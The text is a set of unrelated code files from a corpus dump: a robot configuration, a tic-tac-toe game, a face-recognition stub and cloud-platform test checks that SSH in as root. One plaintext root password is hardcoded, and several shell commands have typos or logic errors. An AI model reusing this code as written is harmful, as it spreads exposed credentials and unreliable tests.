self.ABDUCTION_OFFSET,
-self.ABDUCTION_OFFSET,
self.ABDUCTION_OFFSET,
]
)
################### INERTIAL ####################
self.FRAME_MASS = 0.560 # kg
self.MODULE_MASS = 0.080 # kg
self.LEG_MASS = 0.030 # kg
self.MASS = self.FRAME_MASS + (self.MODULE_MASS + self.LEG_MASS) * 4
# Compensation factor of 3 because the inertia measurement was just
# of the carbon fiber and plastic parts of the frame and did not
# include the hip servos and electronics
self.FRAME_INERTIA = tuple(
map(lambda x: 3.0 * x, (1.844e-4, 1.254e-3, 1.337e-3))
)
self.MODULE_INERTIA = (3.698e-5, 7.127e-6, 4.075e-5)
leg_z = 1e-6
leg_mass = 0.010
leg_x = 1 / 12 * self.LEG_L1 ** 2 * leg_mass
leg_y = leg_x
self.LEG_INERTIA = (leg_x, leg_y, leg_z)
@property
def default_stance(self):
return np.array(
[
[
self.delta_x + self.x_shift,
self.delta_x + self.x_shift,
-self.delta_x + self.x_shift,
-self.delta_x + self.x_shift,
],
[-self.delta_y, self.delta_y, -self.delta_y, self.delta_y],
[0, 0, 0, 0],
]
)
################## SWING ###########################
@property
def z_clearance(self):
return self.__z_clearance
@z_clearance.setter
def z_clearance(self, z):
self.__z_clearance = z
# b_z = np.array([0, 0, 0, 0, self.__z_clearance])
# A_z = np.array(
# [
# [0, 0, 0, 0, 1],
# [1, 1, 1, 1, 1],
# [0, 0, 0, 1, 0],
# [4, 3, 2, 1, 0],
# [0.5 ** 4, 0.5 ** 3, 0.5 ** 2, 0.5 ** 1, 0.5 ** 0],
# ]
# )
# self.z_coeffs = solve(A_z, b_z)
########################### GAIT ####################
@property
def overlap_ticks(self):
return int(self.overlap_time / self.dt)
@property
def swing_ticks(self):
return int(self.swing_time / self.dt)
@property
def stance_ticks(self):
return 2 * self.overlap_ticks + self.swing_ticks
@property
def phase_ticks(self):
return np.array(
[self.overlap_ticks, self.swing_ticks, self.overlap_ticks, self.swing_ticks]
)
@property
def phase_length(self):
return 2 * self.overlap_ticks + 2 * self.swing_ticks
class SimulationConfig:
def __init__(self):
self.XML_IN = "pupper.xml"
self.XML_OUT = "pupper_out.xml"
self.START_HEIGHT = 0.3
self.MU = 1.5 # coeff friction
self.DT = 0.001 # seconds between simulation steps
self.JOINT_SOLREF = "0.001 1" # time constant and damping ratio for joints
self.JOINT_SOLIMP = "0.9 0.95 0.001" # joint constraint parameters
self.GEOM_SOLREF = "0.01 1" # time constant and damping ratio for geom contacts
self.GEOM_SOLIMP = "0.9 0.95 0.001" # geometry contact parameters
# Joint params
G = 220 # Servo gear ratio
m_rotor = 0.016 # Servo rotor mass
r_rotor = 0.005 # Rotor radius
self.ARMATURE = G ** 2 * m_rotor * r_rotor ** 2 # Inertia of rotational joints
# print("Servo armature", self.ARMATURE)
NATURAL_DAMPING = 1.0 # Damping resulting from friction
ELECTRICAL_DAMPING = 0.049 # Damping resulting from back-EMF
self.REV_DAMPING = (
NATURAL_DAMPING + ELECTRICAL_DAMPING
) # Damping torque on the revolute joints
# Servo params
self.SERVO_REV_KP = 300 # Position gain [Nm/rad]
# Force limits
self.MAX_JOINT_TORQUE = 3.0
self.REVOLUTE_RANGE = 1.57
``` |
{
"source": "1323ED5/tic-tac-toe-AI",
"score": 3
} |
#### File: tic-tac-toe-AI/src/game.py
```python
from src.dimension import Dimension
from src.game_mechanic import GameMechanic
from src.turn import generate_turns
from src.utils import clear_console
class AIMixin:
def bot_turn(self):
turns = generate_turns(self.area)
root_dimension = Dimension(self.area, self.active_player)
calculations = root_dimension.born()
winnable_result = max(calculations)
index_of_max = calculations.index(winnable_result)
winnable_turn = turns[index_of_max]
cell_id = winnable_turn.cell_id
self.make_turn(cell_id)
class ConsoleGame(GameMechanic, AIMixin):
def display_area(self):
print()
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[:3])))
print("-" * 11)
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[3:6])))
print("-" * 11)
print("", " | ".join(map(lambda x: " " if x is None else x, self.area[6:9])))
print()
def player_turn(self):
cell_id = int(input("cell_id: "))
self.make_turn(cell_id)
def start(self):
while True:
clear_console()
self.display_area()
if self.active_player == 0:
self.player_turn()
else:
self.bot_turn()
gameover = self.check_game_over()
if gameover is not None:
print("WON:", {1: "AI", 0: "TIE", -1: "YOU"}.get(gameover))
self.display_area()
break
``` |
{
"source": "13240137000/Face",
"score": 4
} |
#### File: 13240137000/Face/compare.py
```python
import face_recognition
def main():
staffs = ['Jack', 'Wubo', 'Ding']
for staff in staffs:
print(staff)
# jack_image = face_recognition.load_image_file("images/jack.jpg")
# unknown_image = face_recognition.load_image_file("images/jack1.jpg")
#
# jack_encoding = face_recognition.face_encodings(jack_image)[0]
# unknown_encoding = face_recognition.face_encodings(unknown_image)[0]
#
# results = face_recognition.compare_faces([jack_encoding], unknown_encoding)
#
# labels = ['Jack']
#
# print('results:' + str(results))
#
# for i in range(0, len(results)):
# if results[i]:
# print('The person is:' + labels[i])
if __name__ == "__main__":
main()
``` |
{
"source": "13242084001/api",
"score": 3
} |
#### File: cloud-v2.0/verify/gol.py
```python
def _init():
global _global_dict
_global_dict = {}
def set_value(key, value):
_global_dict[key] = value
def get_value(key):
return _global_dict.get(key)
_init()
```
#### File: cloud-v2.0/verify/verify.py
```python
from common import sshClient
import time
import eventlet
from .gol import *
import requests
from common.uploadMirror import login
from common.sqlquery import Query
#import pytest
import json
def check_login_response_headers(response):
result = False
if "cloud0" in response.headers.get("Set-Cookie"):
result = True
assert result == True
def logout_ok(response):
pass
def check_stop_py_machine(response):
#print(json.dumps(response.json()))
#print(response.json().get("code"), "yyyyyyyyyyyyyyy")
assert response.json().get("code") == 0
def check_add_role(response):
body_json = response.json()
assert body_json.get("code") == 1
assert body_json.get("error") == None
def check_remove_role(response):
body = response.json()
assert body.get("code") == 1
assert body.get("error") == None
#校验添加区域
def check_add_zone(response):
body = response.json()
resourceIds = body.get("resourceIds")
#print(body)
assert body.get("code") == 1
#assert isinstance(resourceIds,list)
def check_query_zone(response):
body = response.json()
assert body.get("code") == 1
def check_query_cluster(response):
body = response.json()
print("####################################################")
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
#json 校验,暂未使用
def check_cluster_add(response):
body = response.json()
print(body)
def check_physicalmachine_query_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
#assert body.get("rows")
def check_physical_update_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
def check_stop_start_pysicalmachine_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
# 校验查询主存储
def check_mainStorage_query_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
# 校验修改主存储
def check_mainStorage_update_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("resourceIds"), list)
# 校验主存储添加集群查询集群列表
def check_query_clusterUnload_list_ok(response):
body = response.json()
assert body.get("code") == 1
assert isinstance(body.get("rows"), list)
# 校验主存储添加集群
def check_mainStorage_addCluster_ok(response, clusterId, uri):
assert response.json().get('code') == 1
#print(response.json())
result = Query()('SELECT * FROM `cl_host_inf` WHERE CLUSTERID="{0}" AND STATE=1 AND DELETED=0'.format(clusterId))
#print(result)
#print(555555555555555555555555)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmp|grep "{0}"|wc -l'.format(uri)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == len(result):
# print(1111)
flag = True
break
assert flag
def check_delete_mainStorage_ok(response, ids):
id_list = ids.split(",")
#result = Query()(
# 'SELECT COUNT(*) FROM `cl_host_inf` WHERE CLUSTERID="{0}" AND STATE=1 AND DELETED=0'.format(clusterid))
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for id in id_list:
cmd = 'kubectl get vmp|grep "{0}"|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
try:
if not int(ret):
# print(1111)
flag = True
break
except Exception as e:
print(e)
flag = True
break
assert flag
def check_add_mirrorServer_ok(response):
print(response.json())
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmp|grep vmdi|wc -l'
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) > 1:
# print(1111)
flag = True
break
assert flag
#校验添加云主机成功
def check_cloudHost_add_ok(response):
body = response.json()
print(body)
assert body.get("code") == 1
id = body.get("id")
id_len = len(id.split(","))
id = id.replace(",", "|")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vm|grep -E "{0}"|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == id_len:
#print(1111)
flag = True
break
assert flag
#校验查询running状态的云主机
def check_query_vm_status_ok(response, state):
#print("zheshi jjjjjj ", state)
verify_rows = get_value("rows")
num = 0
for row in verify_rows:
if row.get("state") == state:
num += 1
local_rows = response.json().get("rows")
for row in local_rows:
assert row.get("state") == state
continue
assert len(local_rows) == num
def check_query_vm_ok(response, keyword, searchtype):
searchtype_dict = {0: "name", 2: "hostip"}
verify_rows = get_value("rows")
#print(verify_rows,"f"*30)
num = 0
for row in verify_rows:
if keyword in row.get(searchtype_dict.get(searchtype)):
num += 1
local_rows = response.json().get("rows")
for row in local_rows:
assert keyword in row.get(searchtype_dict.get(searchtype))
continue
assert len(local_rows) == num
def search_vmip_list(keyword):
des_url = "http://172.16.130.254:38080/networkCard/query.do"
vm_list = get_value("rows")
#print(vm_list, "8"*10)
vmid_list = [i.get("vmid") for i in vm_list]
result = 0
cookie = login()
for vmid in vmid_list:
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"vmid": vmid
}
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
#print(res.json())
rows = res.json().get("rows")
for row in rows:
if keyword in row.get("ip"):
result += 1
return result
def check_query_vm_ip_ok(response, keyword):
cmp_num = search_vmip_list(keyword=keyword)
rows = response.json().get("rows")
#print(cmp_num, "hhhhhhh")
#print(len(rows))
assert len(rows) == cmp_num
def check_reboot_vm_ok(response):
assert response.json().get("code") == 1
def check_pause_forceStop_stop_ok(response, state, hostip):
vmid = response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'virsh list --all|grep {0}|grep -E "{1}"|wc -l'.format(state, vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
# print(1111)
flag = True
break
assert flag
des_url = "http://172.16.130.254:38080/networkCard/query.do"
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"searchtype": 0,
"keyword": None,
"state": None,
}
cookie = login()
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
# print(res.json())
rows = res.json().get("rows")
if state == "shut":
st = "stopped"
elif state == "paused":
st = state
else:
st = "running"
for row in rows:
if row.get("vmid") == vmid:
assert row.get("state") == st
def check_all_vm_stop(response, ids):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for i in ids.split(","):
cmd = 'kubectl get vm|grep {0}|grep -i shut|wc -l'.format(i)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not (int(ret) - 3):
# print(1111)
flag = True
break
assert flag
def check_cloudDisk_add_ok(response, template=0):
id = response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
if template:
cmd = 'find /var/lib/libvirt/cstor/ -name {0}|wc -l'.format(id)
else:
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
# print(1111)
flag = True
break
assert flag
def check_cloudDiskLoad_or_unload_ok(response, vmid, volumeid, typee=1):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vm {0} -o yaml|grep {1}|wc -l'.format(vmid, volumeid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if typee:
if int(ret):
# print(1111)
flag = True
break
else:
if not int(ret):
# print(1111)
flag = True
break
assert flag
def check_cloudDisk_queryImageserver_ok(response):
rows = response.json().get("rows")
for row in rows:
assert row.get("state") == 1
def check_cloudDisk_snapshot_add_ok(response):
id = response.json().get('id')
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_setQos_ok(response, vmid, rx, tx):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for i in [rx, tx]:
cmd = "kubectl get vm {0} -i yaml|grep 'text: {1}'|wc -l".format(vmid, i*1024*1024)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_cancleQos_ok(response, vmid):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vm {0} -i yaml|grep -E 'write|read'|wc -l".format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_expandVol_ok(response, installpath, size, hostip):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "qume-img info %s|grep virtual|awk '{print $3}'" % (installpath,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if str(ret) == size:
flag = True
break
assert flag
#这个函数本来是用来验证存储迁移查询可选择的物理机列表的,但是开发傻逼,传参没传clusterid,导致这里无法验证
def verify_query_cluster_all_phymachine_ok(response):
pass
def check_cloudDisk_migrate_ok(response, installpath, pmip, msurl, msname):
cloudDiskId = response.json().get("resourceIds")[0]
username = "root"
password = "<PASSWORD>"
ip = pmip
cmd = "kubectl get vmd|grep %s|awk '{print $3}'" % (cloudDiskId,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if msurl in str(ret) and (msurl not in installpath):
flag = True
break
assert flag
des_url = "http://172.16.130.254:38080/cloudDisk/query.do"
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"searchtype": 0,
"keyword": None,
"state": None,
}
cookie = login()
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
# print(res.json())
rows = res.json().get("rows")
for row in rows:
if row.get("volumeid") == cloudDiskId:
assert row.get("msname") == msname
break
def check_query_cloudHost_loadable_or_unloadable_disk_ok(response, vmid, load=1):
if load:
sql_result = Query()("SELECT * FROM `cl_volume_inf` where STATE = 0 and VMID is null;")
else:
sql_result = Query()('SELECT * FROM `cl_volume_inf` where VMID="{0}" and TYPE=2;'.format(vmid,))
sql_volid_list = [x.get("VOLUMEID") for x in sql_result]
json_volid_list = [x.get("volumeid") for x in response.json().get("rows")]
assert len(sql_volid_list) == len(json_volid_list)
for volid in sql_volid_list:
assert volid in json_volid_list
def check_cloudHost_setHa_ok(response, vmid, hostip, cancle=0):
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'kubectl get vm {0} -o yaml|grep -w ha|wc -l'.format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not cancle:
if int(ret):
flag = True
break
else:
if not int(ret):
flag = True
break
assert flag
def check_cloudHost_makeSnapshot_ok(response, vmid, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_makeVMimage_ok(response, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'find / -name {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_modify_cpu_num_ok(response, cpunum_new, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "virsh vcpucount %s|grep current|awk '{print $3}'|tail -1" % (id,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == cpunum_new:
flag = True
break
assert flag
def check_modify_mem_ok(response, memorysize, hostip):
#print(11111111111111111111111111111111111111111)
#print(response.json())
id = response.json().get("id")
#print("this is id....", id)
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "virsh dominfo %s|grep Use|awk '{print $3}'" % (id,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(int(ret)/(1024*1024)) == memorysize:
flag = True
break
assert flag
def check_query_cmrom_iso(response, vmid):
mirrorid_list = Query()('SELECT MIRRORID FROM `cl_mirror_inf` WHERE status=1 and MFORMAT="iso" AND '
'DOMAINID=(SELECT DOMAINID FROM `cl_vm_inf` WHERE VMID="{0}") '
'AND MIRRORID NOT IN (SELECT ISOID FROM `cl_vmcdrom_inf` WHERE'
' VMID="{1}")'.format(vmid, vmid))
rows = response.json().get("rows")
assert len(mirrorid_list) == len(rows)
for row in rows:
assert row.get("mirrorid") in mirrorid_list
def check_addCdrom_ok(vmid, mirrorid, hostip):
username = "root"
password = "user@dev"
ip = hostip
cmd = "kubectl get vm {0} -o yaml|grep {1}.iso|wc -l".format(vmid, mirrorid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if int(ret):
flag = True
break
assert flag
def check_changeBootSequence_ok(response, vmid, bootSeq, hostip):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "kubectl get vm {0} -o yaml|grep order|cut -d: -f 2".format(vmid, )
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
ret = ret.decode("utf-8").replace("\n", "").replace(" ", "")
if bootSeq == 1:
if ret == "12":
flag = True
break
elif bootSeq == 2:
if ret == "21":
flag = True
break
assert flag
def check_changeSystem_querySystem_ok(response, vmid):
mirrorid_list = Query()('SELECT MIRRORID FROM `cl_mirror_inf` WHERE status=1 and MFORMAT!="iso" AND '
'DOMAINID=(SELECT DOMAINID FROM `cl_vm_inf` WHERE VMID="{0}") '
'AND MIRRORID NOT IN (SELECT ISOID FROM `cl_vmcdrom_inf` WHERE'
' VMID="{1}")'.format(vmid, vmid))
rows = response.json().get("rows")
assert len(mirrorid_list) == len(rows)
for row in rows:
assert row.get("mirrorid") in mirrorid_list
def check_changeOs_ok(response, template_url, rootvolumeid, hostip):
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "diff %s `kubectl get vmd %s|tail -1|awk '{print $3}'`|wc -l" % (template_url, rootvolumeid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if not int(ret):
flag = True
break
assert flag
def check_delete_mirror_all_ok(response):
print(response.json())
def check_delete_mirrorServer_ok(response, mirrorServerId):
print(response.json())
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmp|grep {0}|wc -l".format(mirrorServerId)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if not int(ret):
flag = True
break
assert flag
def check_delete_all_resource_ok(response, flag="vm"):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
ids = response.json().get("id")
ids_list = ids.split(",")
for id in ids_list:
if flag == "vm":
cmd = "kubectl get vm|grep {0}|wc -l".format(id)
else:
cmd = "kubectl get vmp|grep {0}|wc -l".format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
#print("this is flag...", flag)
if not int(ret):
flag = True
break
assert flag
def check_delete_net(response, l2vmn_num=2):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep l2network|wc -l"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
try:
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
ret = int(ret)
except Exception:
flag = True
break
if int(l2vmn_num) - ret == 2:
flag = True
break
assert flag
#l2vmn check
def check_creat_net_ok(response, l2vmn_num=0):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep l2network|wc -l"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) - int(l2vmn_num) == 2:
flag = True
break
assert flag
def check_creat_l3_net_ok(response):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep {0}|wc -l".format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_creat_vxlanPool_ok(response, pool_name):
#print(response)
try:
code = response.json().get("code")
if "1" in pool_name:
assert -1 == code
else:
assert 1 == code
except Exception as e:
print(e)
assert True
def check_add_vxlan_vni_ok(response, flag):
print(response.json())
if 3 == flag:
assert response.json().get("code") == 1
if 2 == flag:
assert response.json().get("code") == -1
if 1 == flag:
assert response.json().get("code") == -1
def check_delete_vni_range_ok(response, vni_list, vnistart, endvni):
for vni in vni_list.split(","):
if vni in range(int(vnistart), int(endvni) + 1):
assert -1 == response.json().get("code")
assert 1 == response.json().get("code")
def check_delete_vxlan_net_ok(response, vni, vxlan_clusterid_list):
assert response.json().get("code") == 1
#print(vxlan_clusterid_list)
#print(7777777777777777777777777)
try:
vxlan_clusterid_list = json.loads(vxlan_clusterid_list)
except Exception:
vxlan_clusterid_list = tuple(vxlan_clusterid_list.split(","))
#print(vxlan_clusterid_list)
#print(66666666666666)
if len(vxlan_clusterid_list) > 1:
sql_cmd = 'SELECT HOSTIP FROM `cl_host_inf` WHERE STATE=1 AND DELETED=0 AND `STATUS`="Ready" and CLUSTERID IN {0};'.format(str(vxlan_clusterid_list))
else:
sql_cmd = 'SELECT HOSTIP FROM `cl_host_inf` WHERE STATE=1 AND DELETED=0 AND `STATUS`="Ready" and CLUSTERID="{0}";'.format(vxlan_clusterid_list[0])
#print(sql_cmd)
#print(555555555555555555555)
result = Query()(sql_cmd)
ip_list = []
for re in result:
ip_list.append(re.get("HOSTIP"))
username = "root"
password = "<PASSWORD>"
for ip in ip_list:
cmd = "ovs-vsctl list-br|grep vx{0}|wc -l".format(vni)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.1)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not int(ret):
flag = True
break
assert flag
def check_modify_l3network_mtu(response, mtu):
id = response.json().get("id")
cmd = "ovn-nbctl dhcp-options-get-options `ovn-nbctl show %s|grep dhcp|awk -F\"-\" '{print $3\"-\"$4\"-\"$5\"-\"$6\"-\"$7}'`|grep mtu|cut -d\"=\" -f2" % (id,)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == int(mtu):
flag = True
break
assert flag
def check_l3network_add_dns(response, mtu, rows, nid, dns_addr):
cmd = "ovn-nbctl dhcp-options-get-options `ovn-nbctl show %s|grep dhcp|awk -F\"-\" '{print $3\"-\"$4\"-\"$5\"-\"$6\"-\"$7}'`|grep -E 'mtu|dns'|sed ':a;N;s/\n/\t/;ba;'" % (nid,)
dns_list = [row.get("dns") for row in rows]
re_mtu = 0
re_dns_list = []
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.2)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
tp_str = ret.split()
for i in tp_str:
if "mtu" in i:
re_mtu = int(i.split("=")[1])
elif "dns" in i:
if "," in i:
re_dns_list = i[12:-1].split(",")
else:
re_dns_list.append(i.split("=")[1])
assert int(mtu) == re_mtu
assert dns_addr in re_dns_list
flag_2 = True
for dns in dns_list:
if dns not in re_dns_list:
flag_2 = False
break
if flag_2:
flag = True
break
assert flag
def check_vpc_network_add_ok(response):
id = response.json().get("id")
assert id
cmd = "kubectl get vmn|grep {0}|wc -l".format(id,)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(40, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if 1 == int(ret):
flag = True
break
assert flag
def check_vpc_router_stop_or_start(response):
id = response.json().get("id")
cmd = "kubectl get vm|grep {0}|grep -i shut|wc -l".format(id, )
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(100, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if 1 == int(ret):
flag = True
break
assert flag
def check_setConsolePasswd_ok(response, hostip, passwd=None):
id = response.json().get("id")
if passwd:
cmd = 'cat /tmp/%s.xml |grep passwd|awk -F"passwd=" \'{print $2}\'|cut -d"\"" -f2' % (id,)
else:
cmd = 'cat /tmp/%s.xml |grep passwd|wc -l' % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if passwd:
if ret == str(passwd):
flag = True
break
else:
if not int(ret):
flag = True
break
assert flag
def check_modifyCpuNum_ok(response, hostip, cpunum):
id = response.json().get("id")
cmd = "virsh vcpucount %s|grep current|grep live|awk '{print $3}'" % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == int(cpunum):
flag = True
break
assert flag
def check_modifyVpcMem_ok(response, memory, hostip):
id = response.json().get("id")
cmd = "virsh dominfo %s|grep 'Used mem'|awk '{print $3}'" % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret)/(1024*1024) == int(memory):
flag = True
break
assert flag
``` |
{
"source": "13242084001/tavern",
"score": 2
} |
#### File: testutils/pytesthook/util.py
```python
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
